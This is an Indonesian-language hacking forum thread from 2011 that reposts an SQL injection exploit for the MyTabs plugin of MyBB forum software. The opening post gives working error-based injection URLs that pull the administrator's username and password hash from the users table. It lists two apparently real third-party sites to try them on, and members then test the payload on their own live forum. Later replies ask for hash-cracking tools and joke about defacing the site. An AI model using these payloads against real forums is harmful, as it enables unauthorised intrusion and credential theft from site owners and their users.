Devilzc0de Forum Follow @devilzc0de
  • Home
  • Hacking
  • Networking
  • Programming
  • O.S
  • Server
  • Tweets
  • Search
  • Member List
  • Calendar
Current time: 06-19-2013, 10:05 AM Hello There, Guest! (Login — Register)
Devilzc0de Forum › Information Technology › Hacking › Web Hacking v
« Previous 1 ... 18 19 20 21 22 ... 55 Next »

MyBB 0day \ MyTabs (plugin) SQL injection vulnerability

Home General Computer Multimedia Business Lounge

Post Reply 
Tweet
Threaded Mode | Linear Mode
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
12-04-2011, 06:43 AM
Post: #1
Dr.Localhost Offline
./Devilz Officer
Posts: 171
Joined: Nov 2011
Reputation: 15
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
Assalamualaikum warahmatullah wabarakatuh
dapet di forum luar , di buat belajar


Code:
================================================== ===================
MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
================================================== ===================

# Exploit title : MyBB 0day \ MyTabs (plugin) SQL injection vulnerability.
# Author: AutoRUN & dR.sqL
# Home : skidforums.AL , Autorun-Albania.COM , HackingWith.US , whiteh4t.com
# Date : 01 \ 08 \ 2011
# Tested on : Windows XP , Linux
# Category : web apps
# Software Link : http://mods.mybb.com/view/mytabs
# Google dork : Use your mind kid ^_^ !

Vulnerability :

$~ http://localhost/mybbpath/index.php?tab=[SQLi]

---------------------------------------
# ~ Expl0itation ~ #
---------------------------------------

$~ Get the administrator's username (usually it has uid=1) ~

http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -

$~ Get the administrator's password ~

http://localhost/mybbpath/index.php?tab=1' and(select 1 from(select count(*),concat((select password from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- -



You can try on this site

http://secworm.net/forums/index.php?tab=1'
http://icanhazcookie.net/index.php?tab=1'


belajar

ane coba di Devilzc0de
Quote:http://devilzc0de.org/forum/index.php

sesudah itu ane coba make code inject di atas
penampakan :

1 .http://devilzc0de.org/forum/index.php?tab=1'
2. http://devilzc0de.org/forum/index.php?tab=1

jika make no 1 . akan tetap di index forum
jika make no 2 akan di direct ke

devilzc0de.org/index.php?tab=1
Find all posts by this user
Quote this message in a reply
12-04-2011, 06:45 AM
Post: #2
chaer.newbie Offline
--------------------------
*****
Dewa
Posts: 5,349
Joined: Dec 2009
Reputation: 189
RE: MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
devilzc0de.org/forum/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- - hah
Find all posts by this user
Quote this message in a reply
12-04-2011, 06:56 AM
Post: #3
Dr.Localhost Offline
./Devilz Officer
Posts: 171
Joined: Nov 2011
Reputation: 15
RE: MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
(12-04-2011 06:45 AM)chaer.newbie Wrote:  devilzc0de.org/forum/index.php?tab=1' and(select 1 from(select count(*),concat((select username from mybb_users where uid=1),floor(Rand(0)*2))a from information_schema.tables group by a)b)-- - hah

terkejut
Find all posts by this user
Quote this message in a reply
12-04-2011, 09:09 AM
Post: #4
selfdefense Offline
./Devilz Commodore
Posts: 1,294
Joined: Aug 2010
Reputation: 58
RE: MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
wewww.... klo mo liat user hasil injectnya di bagian mana om...?
ane coba yg DC suman keluar index doang tuh.... belajar
Find all posts by this user
Quote this message in a reply
12-04-2011, 09:33 AM
Post: #5
HeriNHT Offline
./Devilz 1st Cadet
Posts: 40
Joined: Mar 2011
Reputation: 0
RE: MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
klo mybb inject nya msalah nya sampe sekarang hash nya pake toolz ap
Find all posts by this user
Quote this message in a reply
12-05-2011, 08:49 AM
Post: #6
74jTeZ Offline
./Junk3r 1st C4d3t
Posts: 297
Joined: Nov 2011
Reputation: 5
RE: MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
dah gak bisa di dc.. seneng
Find all posts by this user
Quote this message in a reply
12-07-2011, 11:52 AM
Post: #7
HeriNHT Offline
./Devilz 1st Cadet
Posts: 40
Joined: Mar 2011
Reputation: 0
RE: MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
Toolz Untuk Hash Nya Apa :)
Find all posts by this user
Quote this message in a reply
12-07-2011, 11:56 AM
Post: #8
schumbag Offline
nothing special about me
***
Posts: 800
Joined: Jan 2010
Reputation: 51
RE: MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
kelamongan ciyn yo ayo kita deface dc bareng2 ngakak biar chaer gk kelar2 skripsinya ngakak
jangan DdoS ntar kita mati gaya dead
Find all posts by this user
Quote this message in a reply
12-07-2011, 12:07 PM
Post: #9
HeriNHT Offline
./Devilz 1st Cadet
Posts: 40
Joined: Mar 2011
Reputation: 0
RE: MyBB 0day \ MyTabs (plugin) SQL injection vulnerability
Klo Di DDos Om Chaer Ngamuk dead bahaya serius jaga DCbelajar
Find all posts by this user
Quote this message in a reply
« Next Oldest | Next Newest »
Post Reply 


Topic Tools
Topic Link :
BBCode :
HTML Code :
View a Printable Version Send Thread to a Friend Subscribe to this thread
Submit Google Submit Face book Submit to Digg Submit to Reddit Submit to Furl Submit to Del.icio.us Submit to Jeqq

Possibly Related Threads...
Thread: Author Replies: Views: Last Post
  [Tutor] SQL Injection For Newbie (Share Di Mari) cangcimen 63 4,225 Yesterday 12:32 AM
Last Post: Xscale
  [Solved] sql injection belajarcarding 11 287 05-10-2013 11:22 AM
Last Post: -=[A][R][I]=-
  [Tutor] Vulnerability Assessment studi kasus cms lokomedia wenkhairu 33 1,405 04-27-2013 04:30 PM
Last Post: acne007
  WORDPRESS vulnerability you've got username and password Wayc0de 38 2,455 04-25-2013 04:41 PM
Last Post: antonkill
  [Tutor] SQL injection di globaltv.co.id Exsposed wenkhairu 36 2,422 04-20-2013 03:27 PM
Last Post: fachrycanthropuS
  [Tutor] Detect web vulnerability scanner with modsecurity protocolunique 24 1,749 03-25-2013 09:21 PM
Last Post: protocolunique
  [Tutor] Cara Deface sangat Mudah dengan XSS Vulnerability HackForJihad 11 667 03-25-2013 09:48 AM
Last Post: lanionk
  SQL Injection "detail_prod" server luxembourg [dc]zombierss[dc] 30 498 03-17-2013 11:41 AM
Last Post: Rifaldi238
  List Cheat Blind SQL Injection (Mysql) devilz666 7 359 03-09-2013 02:23 PM
Last Post: jawaklagi
  [Tutor] Sql Injection into outfile [tambahan] KotoM 23 862 02-23-2013 10:52 PM
Last Post: soulheaven

Users Browsing
1 Guest(s)

  • Contact Us
  • devilzc0de
  • Return to Top
  • Mobile Version
  • RSS Syndication
  • Help
Current time: 06-19-2013, 10:05 AM Powered By MyBB, © 2002-2013 MyBB Group. Theme created by Justin S. | Mixed By Chaer.Newbie | Fixed By Aditya

USING THIS SITE INDICATES THAT YOU HAVE READ AND ACCEPT OUR TERMS. IF YOU DO NOT ACCEPT THESE TERMS, YOU ARE NOT AUTHORIZED TO USE THIS SITE